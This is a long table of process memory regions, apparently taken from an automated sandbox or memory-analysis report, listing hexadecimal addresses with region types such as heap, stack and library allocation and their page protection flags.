2463B715000
|
trusted library allocation
|
page read and write
|
||
2463B713000
|
trusted library allocation
|
page read and write
|
||
1C8AEF2D000
|
trusted library allocation
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
65E4000
|
heap
|
page read and write
|
||
65FC000
|
heap
|
page read and write
|
||
1BF2C267000
|
trusted library allocation
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
1C8AEE84000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
2CB12B61000
|
heap
|
page read and write
|
||
1BF1C1F1000
|
trusted library allocation
|
page read and write
|
||
6C68D000
|
unkown
|
page readonly
|
||
4AEE000
|
heap
|
page read and write
|
||
28600077000
|
trusted library allocation
|
page read and write
|
||
18B0000
|
heap
|
page read and write
|
||
1BF2C3AE000
|
trusted library allocation
|
page read and write
|
||
1BF2C902000
|
trusted library allocation
|
page read and write
|
||
6C26D000
|
unkown
|
page read and write
|
||
28115658000
|
heap
|
page read and write
|
||
6C5D5000
|
unkown
|
page readonly
|
||
1D75C507000
|
heap
|
page read and write
|
||
4380000
|
heap
|
page read and write
|
||
6601000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
1BF34EEB000
|
heap
|
page read and write
|
||
1BF2DA5A000
|
trusted library allocation
|
page read and write
|
||
1C8AEB75000
|
trusted library allocation
|
page read and write
|
||
1D6C7387000
|
heap
|
page read and write
|
||
22500355000
|
trusted library allocation
|
page read and write
|
||
12E4000
|
unkown
|
page readonly
|
||
1BF2DAA5000
|
trusted library allocation
|
page read and write
|
||
3AA7000
|
heap
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
1BF2CFA8000
|
trusted library allocation
|
page read and write
|
||
51FA000
|
heap
|
page read and write
|
||
4FA9000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
4385000
|
heap
|
page read and write
|
||
2463BAF6000
|
trusted library allocation
|
page read and write
|
||
444D000
|
heap
|
page read and write
|
||
6574000
|
heap
|
page read and write
|
||
6C7D0000
|
unkown
|
page readonly
|
||
1BF1A6EB000
|
heap
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
4D56000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
1BF1C468000
|
trusted library allocation
|
page read and write
|
||
1BF34F11000
|
heap
|
page read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
22500476000
|
trusted library allocation
|
page read and write
|
||
2867CD95000
|
heap
|
page read and write
|
||
1AD132B0000
|
heap
|
page read and write
|
||
1BF2D8E5000
|
trusted library allocation
|
page read and write
|
||
4EE3000
|
heap
|
page read and write
|
||
2463B703000
|
trusted library allocation
|
page read and write
|
||
2867C957000
|
heap
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
45D8000
|
heap
|
page read and write
|
||
1C8AEBC1000
|
trusted library allocation
|
page read and write
|
||
6C268000
|
unkown
|
page readonly
|
||
54B6000
|
heap
|
page read and write
|
||
4AFC000
|
heap
|
page read and write
|
||
27567EB0000
|
heap
|
page read and write
|
||
1BF1C66D000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
4AC5000
|
heap
|
page read and write
|
||
5813AFF000
|
stack
|
page read and write
|
||
1C8AEB49000
|
trusted library allocation
|
page read and write
|
||
1BF2D930000
|
trusted library allocation
|
page read and write
|
||
1BF1A6B0000
|
heap
|
page read and write
|
||
1BF2D130000
|
trusted library allocation
|
page read and write
|
||
1BF1A640000
|
heap
|
page read and write
|
||
1C8ACC20000
|
heap
|
page read and write
|
||
148E4C20000
|
heap
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
2250034B000
|
trusted library allocation
|
page read and write
|
||
27567A60000
|
heap
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
1BF1C1F5000
|
trusted library allocation
|
page read and write
|
||
266D1520000
|
heap
|
page read and write
|
||
1BF1C439000
|
trusted library allocation
|
page read and write
|
||
15B55840000
|
heap
|
page read and write
|
||
1D75C710000
|
heap
|
page read and write
|
||
CF5BAFF000
|
stack
|
page read and write
|
||
1C8AEE8B000
|
trusted library allocation
|
page read and write
|
||
1BF2CFD0000
|
trusted library allocation
|
page read and write
|
||
1BF1C5E6000
|
trusted library allocation
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
2756A0F0000
|
heap
|
page execute and read and write
|
||
18C0000
|
heap
|
page read and write
|
||
1BF1A6C1000
|
heap
|
page read and write
|
||
4BE3000
|
heap
|
page read and write
|
||
2867C850000
|
heap
|
page read and write
|
||
7FFD9B98A000
|
trusted library allocation
|
page read and write
|
||
1BF1A8C0000
|
trusted library allocation
|
page read and write
|
||
5846000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
660B000
|
heap
|
page read and write
|
||
7FFD9B919000
|
trusted library allocation
|
page read and write
|
||
2463B6B7000
|
trusted library allocation
|
page read and write
|
||
1BF1C1DD000
|
trusted library allocation
|
page read and write
|
||
2860006F000
|
trusted library allocation
|
page read and write
|
||
3AE4000
|
heap
|
page read and write
|
||
2CB12DB0000
|
heap
|
page read and write
|
||
2750002D000
|
trusted library allocation
|
page read and write
|
||
28600037000
|
trusted library allocation
|
page read and write
|
||
6605000
|
heap
|
page read and write
|
||
4523000
|
heap
|
page read and write
|
||
6C784000
|
unkown
|
page readonly
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
4AAA000
|
heap
|
page read and write
|
||
2250034D000
|
trusted library allocation
|
page read and write
|
||
3ACA000
|
heap
|
page read and write
|
||
4348000
|
heap
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2D004000
|
trusted library allocation
|
page read and write
|
||
4C54000
|
heap
|
page read and write
|
||
6650000
|
heap
|
page read and write
|
||
7FFD9B8F9000
|
trusted library allocation
|
page read and write
|
||
EF0000
|
unkown
|
page readonly
|
||
4B80000
|
heap
|
page read and write
|
||
1BF2C40E000
|
trusted library allocation
|
page read and write
|
||
4B3F000
|
heap
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
1BF1C7A3000
|
trusted library allocation
|
page read and write
|
||
BD954FD000
|
stack
|
page read and write
|
||
2250034F000
|
trusted library allocation
|
page read and write
|
||
22500347000
|
trusted library allocation
|
page read and write
|
||
1BF1C448000
|
trusted library allocation
|
page read and write
|
||
22578F7F000
|
heap
|
page read and write
|
||
6C2E1000
|
unkown
|
page execute read
|
||
1BF2D0DA000
|
trusted library allocation
|
page read and write
|
||
6C829000
|
unkown
|
page read and write
|
||
2250007F000
|
trusted library allocation
|
page read and write
|
||
C27D9FE000
|
stack
|
page read and write
|
||
1BF34F34000
|
heap
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
2463B6FB000
|
trusted library allocation
|
page read and write
|
||
6C787000
|
unkown
|
page read and write
|
||
1D75C460000
|
heap
|
page read and write
|
||
6C252000
|
unkown
|
page read and write
|
||
C1168FE000
|
stack
|
page read and write
|
||
C1166FF000
|
stack
|
page read and write
|
||
4B85000
|
heap
|
page read and write
|
||
1C8AEBB1000
|
trusted library allocation
|
page read and write
|
||
266D15F9000
|
heap
|
page read and write
|
||
7FFD9B7AC000
|
trusted library allocation
|
page execute and read and write
|
||
1C8AEE9B000
|
trusted library allocation
|
page read and write
|
||
1BF2D830000
|
trusted library allocation
|
page read and write
|
||
27500464000
|
trusted library allocation
|
page read and write
|
||
4BBA000
|
heap
|
page read and write
|
||
28600091000
|
trusted library allocation
|
page read and write
|
||
2463BAFB000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
1BF2D25A000
|
trusted library allocation
|
page read and write
|
||
4B84000
|
heap
|
page read and write
|
||
1BF1C41E000
|
trusted library allocation
|
page read and write
|
||
22578F76000
|
heap
|
page read and write
|
||
1BF2C8FA000
|
trusted library allocation
|
page read and write
|
||
1BF2CAE5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
4AC5000
|
heap
|
page read and write
|
||
1BF1C2A7000
|
trusted library allocation
|
page read and write
|
||
2463B9D9000
|
trusted library allocation
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
4B03000
|
heap
|
page read and write
|
||
50F2000
|
heap
|
page read and write
|
||
4BC7000
|
heap
|
page read and write
|
||
225003AD000
|
trusted library allocation
|
page read and write
|
||
2867CAC0000
|
trusted library allocation
|
page read and write
|
||
2463BAC8000
|
trusted library allocation
|
page read and write
|
||
1C8AEBD1000
|
trusted library allocation
|
page read and write
|
||
1BF2D125000
|
trusted library allocation
|
page read and write
|
||
1BF34D70000
|
trusted library allocation
|
page read and write
|
||
266D3453000
|
trusted library allocation
|
page read and write
|
||
3AB7000
|
heap
|
page read and write
|
||
24639ED5000
|
heap
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
2860047F000
|
trusted library allocation
|
page read and write
|
||
24639AB8000
|
heap
|
page read and write
|
||
1BF2D905000
|
trusted library allocation
|
page read and write
|
||
43AC000
|
heap
|
page read and write
|
||
452F000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
BD93F6D000
|
stack
|
page read and write
|
||
1BF2D7D1000
|
trusted library allocation
|
page read and write
|
||
1BF2C83F000
|
trusted library allocation
|
page read and write
|
||
27EBFCF000
|
stack
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
18CA000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
BD957FE000
|
stack
|
page read and write
|
||
4AC5000
|
heap
|
page read and write
|
||
2463B691000
|
trusted library allocation
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
1BF1A686000
|
heap
|
page read and write
|
||
24639ED0000
|
heap
|
page read and write
|
||
1BF2CFE6000
|
trusted library allocation
|
page read and write
|
||
1BF2D7DE000
|
trusted library allocation
|
page read and write
|
||
28600085000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
1BF2C8E5000
|
trusted library allocation
|
page read and write
|
||
1BF2C96F000
|
trusted library allocation
|
page read and write
|
||
266D3587000
|
trusted library allocation
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
2463B9CF000
|
trusted library allocation
|
page read and write
|
||
1BF2C819000
|
trusted library allocation
|
page read and write
|
||
1C8AEBD5000
|
trusted library allocation
|
page read and write
|
||
1D6C73AB000
|
heap
|
page read and write
|
||
2463B9CD000
|
trusted library allocation
|
page read and write
|
||
286003AD000
|
trusted library allocation
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
1BF1A6C3000
|
heap
|
page read and write
|
||
BD94CFE000
|
stack
|
page read and write
|
||
4329000
|
heap
|
page read and write
|
||
4382000
|
heap
|
page read and write
|
||
1D6C73AB000
|
heap
|
page read and write
|
||
C27D7FE000
|
stack
|
page read and write
|
||
6607000
|
heap
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page execute and read and write
|
||
266D358A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B929000
|
trusted library allocation
|
page read and write
|
||
1BF2D105000
|
trusted library allocation
|
page read and write
|
||
CF5BBFE000
|
stack
|
page read and write
|
||
15B55AC0000
|
heap
|
page read and write
|
||
4AEE000
|
heap
|
page read and write
|
||
5313000
|
heap
|
page read and write
|
||
1BF35130000
|
heap
|
page read and write
|
||
2750046A000
|
trusted library allocation
|
page read and write
|
||
188F000
|
stack
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
2463BAEA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1BF2C1D4000
|
trusted library allocation
|
page read and write
|
||
2463B705000
|
trusted library allocation
|
page read and write
|
||
45F4000
|
heap
|
page read and write
|
||
6C544000
|
unkown
|
page readonly
|
||
266D1440000
|
heap
|
page read and write
|
||
1BF2C30E000
|
trusted library allocation
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
2860034B000
|
trusted library allocation
|
page read and write
|
||
5B29000
|
heap
|
page read and write
|
||
1BF2C2BE000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C821000
|
trusted library allocation
|
page read and write
|
||
EF1000
|
unkown
|
page execute read
|
||
6C7D1000
|
unkown
|
page execute read
|
||
4C91000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1C8AEBCD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
22579140000
|
heap
|
page read and write
|
||
27567B43000
|
heap
|
page read and write
|
||
1AD13352000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
1D6C73BA000
|
heap
|
page read and write
|
||
6C5E1000
|
unkown
|
page execute read
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
3DAC9AF000
|
stack
|
page read and write
|
||
49A4000
|
heap
|
page read and write
|
||
4B5B000
|
heap
|
page read and write
|
||
266D17E5000
|
heap
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
C8E02FF000
|
unkown
|
page read and write
|
||
C11635E000
|
stack
|
page read and write
|
||
4BDB000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
6C1E0000
|
unkown
|
page readonly
|
||
634E000
|
heap
|
page read and write
|
||
266D15E7000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
4ADF000
|
heap
|
page read and write
|
||
2250047D000
|
trusted library allocation
|
page read and write
|
||
28600479000
|
trusted library allocation
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
2463BA25000
|
trusted library allocation
|
page read and write
|
||
4EE2000
|
heap
|
page read and write
|
||
148E4D18000
|
heap
|
page read and write
|
||
1BF1A8A0000
|
trusted library allocation
|
page read and write
|
||
2CB12B33000
|
heap
|
page read and write
|
||
2463B6B3000
|
trusted library allocation
|
page read and write
|
||
6225000
|
heap
|
page read and write
|
||
266D318F000
|
trusted library allocation
|
page read and write
|
||
4C65000
|
heap
|
page read and write
|
||
1C8AEB73000
|
trusted library allocation
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
6402000
|
heap
|
page read and write
|
||
24639A78000
|
heap
|
page read and write
|
||
1D75C500000
|
heap
|
page read and write
|
||
4A8F000
|
heap
|
page read and write
|
||
1BF1A990000
|
heap
|
page execute and read and write
|
||
28600467000
|
trusted library allocation
|
page read and write
|
||
1BF1C20D000
|
trusted library allocation
|
page read and write
|
||
1BF34D48000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
27567892000
|
unkown
|
page readonly
|
||
1BF2C836000
|
trusted library allocation
|
page read and write
|
||
637A000
|
heap
|
page read and write
|
||
45EB000
|
heap
|
page read and write
|
||
27567AFD000
|
heap
|
page read and write
|
||
4359000
|
heap
|
page read and write
|
||
C27DFFB000
|
stack
|
page read and write
|
||
1BF2CFF7000
|
trusted library allocation
|
page read and write
|
||
1BF35231000
|
heap
|
page read and write
|
||
1BF2C85F000
|
trusted library allocation
|
page read and write
|
||
633C000
|
heap
|
page read and write
|
||
1BF1C480000
|
trusted library allocation
|
page read and write
|
||
51D2000
|
heap
|
page read and write
|
||
1BF1C442000
|
trusted library allocation
|
page read and write
|
||
3DACC7F000
|
stack
|
page read and write
|
||
4A10000
|
heap
|
page read and write
|
||
4D98000
|
heap
|
page read and write
|
||
1BF2D8A5000
|
trusted library allocation
|
page read and write
|
||
1BF1C464000
|
trusted library allocation
|
page read and write
|
||
2463B9D5000
|
trusted library allocation
|
page read and write
|
||
6C1DA000
|
unkown
|
page readonly
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
2860007F000
|
trusted library allocation
|
page read and write
|
||
28600359000
|
trusted library allocation
|
page read and write
|
||
6333000
|
heap
|
page read and write
|
||
15B558E0000
|
heap
|
page read and write
|
||
1BF2CFF0000
|
trusted library allocation
|
page read and write
|
||
2860002F000
|
trusted library allocation
|
page read and write
|
||
1D6C7640000
|
heap
|
page read and write
|
||
2250033F000
|
trusted library allocation
|
page read and write
|
||
45FF000
|
heap
|
page read and write
|
||
1BF2D000000
|
trusted library allocation
|
page read and write
|
||
139B000
|
stack
|
page read and write
|
||
1D6C736B000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
28600033000
|
trusted library allocation
|
page read and write
|
||
24653FF0000
|
heap
|
page read and write
|
||
6603000
|
heap
|
page read and write
|
||
1BF2D838000
|
trusted library allocation
|
page read and write
|
||
28600079000
|
trusted library allocation
|
page read and write
|
||
4C14000
|
heap
|
page read and write
|
||
4FEA000
|
heap
|
page read and write
|
||
1BF2DF68000
|
trusted library allocation
|
page read and write
|
||
286003A1000
|
trusted library allocation
|
page read and write
|
||
C8E03FF000
|
stack
|
page read and write
|
||
C27E0FD000
|
stack
|
page read and write
|
||
1BF1C861000
|
trusted library allocation
|
page read and write
|
||
1BF1A8E0000
|
heap
|
page read and write
|
||
1AD132D0000
|
heap
|
page read and write
|
||
22500448000
|
trusted library allocation
|
page read and write
|
||
1BF2CA9A000
|
trusted library allocation
|
page read and write
|
||
22578FBE000
|
heap
|
page read and write
|
||
1BF2DFA6000
|
trusted library allocation
|
page read and write
|
||
BD950FE000
|
stack
|
page read and write
|
||
1BF2C859000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page execute and read and write
|
||
6E50AFE000
|
stack
|
page read and write
|
||
4B0A000
|
heap
|
page read and write
|
||
1B52000
|
heap
|
page read and write
|
||
1C8AEEE3000
|
trusted library allocation
|
page read and write
|
||
225791A0000
|
trusted library allocation
|
page read and write
|
||
411E000
|
stack
|
page read and write
|
||
1C8BEB41000
|
trusted library allocation
|
page read and write
|
||
2867C8F0000
|
heap
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
1BF2D819000
|
trusted library allocation
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
4450000
|
heap
|
page read and write
|
||
28600031000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
1D75C360000
|
heap
|
page read and write
|
||
24639AB6000
|
heap
|
page read and write
|
||
1BF34F2E000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
CF5BDFF000
|
stack
|
page read and write
|
||
3AB9000
|
heap
|
page read and write
|
||
1BF2C306000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
heap
|
page read and write
|
||
1BF1C407000
|
trusted library allocation
|
page read and write
|
||
1BF2D0FA000
|
trusted library allocation
|
page read and write
|
||
1F10000
|
unclassified section
|
page read and write
|
||
3AAD000
|
heap
|
page read and write
|
||
1C8AEBB7000
|
trusted library allocation
|
page read and write
|
||
2463B6F9000
|
trusted library allocation
|
page read and write
|
||
1BF2C2B6000
|
trusted library allocation
|
page read and write
|
||
63C0000
|
heap
|
page read and write
|
||
1BF34D3F000
|
heap
|
page read and write
|
||
1BF1C44A000
|
trusted library allocation
|
page read and write
|
||
27500467000
|
trusted library allocation
|
page read and write
|
||
CF5B8FE000
|
stack
|
page read and write
|
||
22578F10000
|
heap
|
page read and write
|
||
28600071000
|
trusted library allocation
|
page read and write
|
||
28600473000
|
trusted library allocation
|
page read and write
|
||
1BF1A870000
|
heap
|
page read and write
|
||
22578FB8000
|
heap
|
page read and write
|
||
C1167FE000
|
stack
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
6C273000
|
unkown
|
page write copy
|
||
4359000
|
heap
|
page read and write
|
||
2463BAF9000
|
trusted library allocation
|
page read and write
|
||
2463B701000
|
trusted library allocation
|
page read and write
|
||
2250007B000
|
trusted library allocation
|
page read and write
|
||
3AE3000
|
heap
|
page read and write
|
||
7FFD9B939000
|
trusted library allocation
|
page read and write
|
||
BD93FFE000
|
stack
|
page read and write
|
||
1C8AEF23000
|
trusted library allocation
|
page read and write
|
||
6C5F3000
|
unkown
|
page readonly
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
1BF2C9DA000
|
trusted library allocation
|
page read and write
|
||
1BF2D7C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
4321000
|
heap
|
page read and write
|
||
275004AC000
|
trusted library allocation
|
page read and write
|
||
6C689000
|
unkown
|
page readonly
|
||
1BF1C764000
|
trusted library allocation
|
page read and write
|
||
4CD2000
|
heap
|
page read and write
|
||
4CF5000
|
heap
|
page read and write
|
||
1BF2D8D0000
|
trusted library allocation
|
page read and write
|
||
22500035000
|
trusted library allocation
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
3A9E000
|
heap
|
page read and write
|
||
4AC5000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
4F0A000
|
heap
|
page read and write
|
||
1BF2D78E000
|
trusted library allocation
|
page read and write
|
||
63BB000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
1BF34190000
|
trusted library allocation
|
page read and write
|
||
1C8AEB6F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
1A9A000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
1BF2DFC0000
|
trusted library allocation
|
page read and write
|
||
4B46000
|
heap
|
page read and write
|
||
94CB7FF000
|
stack
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
12DF000
|
unkown
|
page write copy
|
||
C116AFE000
|
stack
|
page read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
1BF34B00000
|
heap
|
page read and write
|
||
12DE000
|
unkown
|
page write copy
|
||
1BF2C1EF000
|
trusted library allocation
|
page read and write
|
||
65E6000
|
heap
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
2250008D000
|
trusted library allocation
|
page read and write
|
||
3AA7000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
22578F20000
|
heap
|
page read and write
|
||
1BF2C965000
|
trusted library allocation
|
page read and write
|
||
1BF2C811000
|
trusted library allocation
|
page read and write
|
||
2CB12B4C000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
6C4B2000
|
unkown
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
4406000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
4AF5000
|
heap
|
page read and write
|
||
27510001000
|
trusted library allocation
|
page read and write
|
||
4AAA000
|
heap
|
page read and write
|
||
CCB937F000
|
stack
|
page read and write
|
||
1BF1C451000
|
trusted library allocation
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
1BF1A8D3000
|
trusted library allocation
|
page read and write
|
||
4B6D000
|
heap
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
266D3121000
|
trusted library allocation
|
page read and write
|
||
1C8AEE91000
|
trusted library allocation
|
page read and write
|
||
435A000
|
heap
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
4C01000
|
heap
|
page read and write
|
||
1BF2CFCE000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
27567C40000
|
heap
|
page read and write
|
||
2867C880000
|
heap
|
page read and write
|
||
1BF1A68C000
|
heap
|
page read and write
|
||
2463B6B5000
|
trusted library allocation
|
page read and write
|
||
61E4000
|
heap
|
page read and write
|
||
1C8AEBCB000
|
trusted library allocation
|
page read and write
|
||
4B96000
|
heap
|
page read and write
|
||
1BF1C7DB000
|
trusted library allocation
|
page read and write
|
||
C116DFE000
|
stack
|
page read and write
|
||
2867C8F8000
|
heap
|
page read and write
|
||
1BF2D8DA000
|
trusted library allocation
|
page read and write
|
||
1BF1C1F9000
|
trusted library allocation
|
page read and write
|
||
1C8AEFB9000
|
trusted library allocation
|
page read and write
|
||
6E500FD000
|
stack
|
page read and write
|
||
444F000
|
heap
|
page read and write
|
||
2860034F000
|
trusted library allocation
|
page read and write
|
||
1BF34B03000
|
heap
|
page read and write
|
||
4C37000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
CF5B9FD000
|
stack
|
page read and write
|
||
1BF2C396000
|
trusted library allocation
|
page read and write
|
||
1C8ACCC0000
|
trusted library allocation
|
page read and write
|
||
1C8ACD37000
|
heap
|
page read and write
|
||
4832000
|
heap
|
page read and write
|
||
1C8AEFB3000
|
trusted library allocation
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
1845000
|
heap
|
page read and write
|
||
22500359000
|
trusted library allocation
|
page read and write
|
||
2463BAF0000
|
trusted library allocation
|
page read and write
|
||
50A4000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
4C20000
|
heap
|
page read and write
|
||
1BF2C857000
|
trusted library allocation
|
page read and write
|
||
1BF350E0000
|
heap
|
page read and write
|
||
4C71000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
28600353000
|
trusted library allocation
|
page read and write
|
||
6C53F000
|
unkown
|
page read and write
|
||
5176000
|
heap
|
page read and write
|
||
1BF34F02000
|
heap
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
1D6C73BA000
|
heap
|
page read and write
|
||
3AC1000
|
heap
|
page read and write
|
||
3A96000
|
heap
|
page read and write
|
||
22500085000
|
trusted library allocation
|
page read and write
|
||
28600093000
|
trusted library allocation
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
4529000
|
heap
|
page read and write
|
||
4874000
|
heap
|
page read and write
|
||
6C5EB000
|
unkown
|
page readonly
|
||
1C8ACD0A000
|
heap
|
page read and write
|
||
1C8ACCD8000
|
heap
|
page read and write
|
||
527E000
|
heap
|
page read and write
|
||
62AF000
|
heap
|
page read and write
|
||
4E5E000
|
heap
|
page read and write
|
||
1BF1C5DE000
|
trusted library allocation
|
page read and write
|
||
1BF2C1D9000
|
trusted library allocation
|
page read and write
|
||
225003E1000
|
trusted library allocation
|
page read and write
|
||
1BF1C46C000
|
trusted library allocation
|
page read and write
|
||
94CADCE000
|
stack
|
page read and write
|
||
BD942FE000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
24639A50000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
4320000
|
heap
|
page read and write
|
||
27567B13000
|
heap
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
22500470000
|
trusted library allocation
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
24639A75000
|
heap
|
page read and write
|
||
12E4000
|
unkown
|
page readonly
|
||
266D169E000
|
heap
|
page read and write
|
||
1BF2C3B6000
|
trusted library allocation
|
page read and write
|
||
1BF2D060000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
heap
|
page read and write
|
||
C27DBFF000
|
stack
|
page read and write
|
||
1BF34ED0000
|
heap
|
page read and write
|
||
2CB12A20000
|
heap
|
page read and write
|
||
28115840000
|
heap
|
page read and write
|
||
6C832000
|
unkown
|
page write copy
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
3A91000
|
heap
|
page read and write
|
||
511A000
|
heap
|
page read and write
|
||
266D3599000
|
trusted library allocation
|
page read and write
|
||
1BF1C300000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
1BF2C18C000
|
trusted library allocation
|
page read and write
|
||
28600476000
|
trusted library allocation
|
page read and write
|
||
4E21000
|
heap
|
page read and write
|
||
4382000
|
heap
|
page read and write
|
||
22578F7B000
|
heap
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
4D14000
|
heap
|
page read and write
|
||
1BF353D4000
|
heap
|
page read and write
|
||
1BF34ED9000
|
heap
|
page read and write
|
||
E5143FD000
|
stack
|
page read and write
|
||
5971000
|
heap
|
page read and write
|
||
3A8D000
|
heap
|
page read and write
|
||
22500001000
|
trusted library allocation
|
page read and write
|
||
2CB12DB5000
|
heap
|
page read and write
|
||
4B5A000
|
heap
|
page read and write
|
||
1BF2C3A6000
|
trusted library allocation
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
225003E3000
|
trusted library allocation
|
page read and write
|
||
1BF1C86D000
|
trusted library allocation
|
page read and write
|
||
2250006F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1BF2C93A000
|
trusted library allocation
|
page read and write
|
||
11FA000
|
unkown
|
page read and write
|
||
1C8AEBC9000
|
trusted library allocation
|
page read and write
|
||
286003E3000
|
trusted library allocation
|
page read and write
|
||
1BF1C323000
|
trusted library allocation
|
page read and write
|
||
452D000
|
heap
|
page read and write
|
||
22578F8D000
|
heap
|
page read and write
|
||
6352000
|
heap
|
page read and write
|
||
437F000
|
heap
|
page read and write
|
||
5813A7C000
|
stack
|
page read and write
|
||
1BF1C4C8000
|
trusted library allocation
|
page read and write
|
||
5813B7F000
|
stack
|
